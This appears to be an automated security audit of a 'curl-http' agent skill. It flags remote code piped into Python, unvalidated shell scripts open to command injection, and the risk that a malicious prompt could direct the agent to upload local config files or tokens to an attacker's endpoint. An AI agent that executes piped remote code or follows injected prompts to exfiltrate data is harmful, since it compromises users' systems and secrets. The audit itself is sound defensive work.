Skills
skills/1mangesh1/dev-skills-collection/curl-http/Gen Agent Trust Hub

curl-http

Fail

Audited by Gen Agent Trust Hub on Feb 21, 2026

Risk Level: HIGHREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONDATA_EXFILTRATION
Full Analysis
  • [REMOTE_CODE_EXECUTION] (HIGH): Automated scans identified a high-risk instruction in SKILL.md where output from a remote URL is piped directly to a Python interpreter (curl -s https://api.example.com | python). Piping untrusted web content into a shell or runtime environment is a major security vulnerability that can lead to full system compromise.
  • [COMMAND_EXECUTION] (MEDIUM): The scripts 'api-tester.sh' and 'http-debug.sh' dynamically construct cURL commands using variables for the URL and data payload without any validation or escaping. This creates a surface for command injection if the input source is untrusted.
  • [DATA_EXFILTRATION] (LOW): While the skill is intended for API testing, the capability to send arbitrary files via form upload (e.g., curl -F file=@path) and custom headers could be misused by a malicious prompt to exfiltrate local configuration files or sensitive tokens if the agent is directed to an attacker-controlled endpoint.
Recommendations
  • HIGH: Downloads and executes remote code from: https://api.example.com - DO NOT USE without thorough review
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Feb 21, 2026, 07:02 AM